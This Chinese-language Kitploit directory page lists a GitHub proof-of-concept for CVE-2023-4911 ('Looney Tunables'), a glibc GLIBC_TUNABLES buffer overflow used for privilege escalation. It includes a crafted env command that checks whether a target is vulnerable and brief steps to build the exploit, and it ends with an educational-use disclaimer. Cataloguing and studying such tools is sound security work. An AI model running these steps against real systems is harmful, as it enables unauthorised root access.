Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
looney-tunables-CVE-2023-4911 — CVE-2023-4911(Looney Tunables)的概念验证漏洞利用程序,针对glibc的GLIBC_TUNABLES解析中的缓冲区溢出。包含漏洞检测和用于权限提升的已编译漏洞利用程序。 | Kitploit
工具/GitHubGitHub/hadrian3689/looney-tunables-cve-2023-4911
漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubhadrian3689/looney-tunables-cve-2023-4911

looney-tunables-CVE-2023-4911

CVE-2023-4911(Looney Tunables)的概念验证漏洞利用程序,针对glibc的GLIBC_TUNABLES解析中的缓冲区溢出。包含漏洞检测和用于权限提升的已编译漏洞利用程序。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
29652年前Kitploit 审核通过
分享

CVE-2023-4911 Looney Tunables 的 PoC

这是一个 CVE-2023-4911(又名 "Looney Tunables")的 PoC,利用 glibc 动态加载器中 GLIBC_TUNABLES 环境变量解析函数 parse_tunables() 的漏洞。

开始使用

执行程序

  • 我们可以检查目标是否易受攻击
root@kitploit:~
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
  • 如果我们收到 Segmentation fault (core dumped),则说明目标存在漏洞。

执行程序

  • 创建 libc.so.6 文件
root@kitploit:~
python3 libc.py
  • 编译漏洞利用程序
root@kitploit:~
gcc exp.c -o exp

免责声明

此存储库中提供的所有代码仅用于教育/研究目的。与此存储库中包含的材料相关的任何行为和/或活动均由您自行负责。滥用此存储库中的代码可能导致相关人员受到刑事指控。对于任何滥用此存储库中的代码违反法律的个人,作者不承担任何责任。

下载工具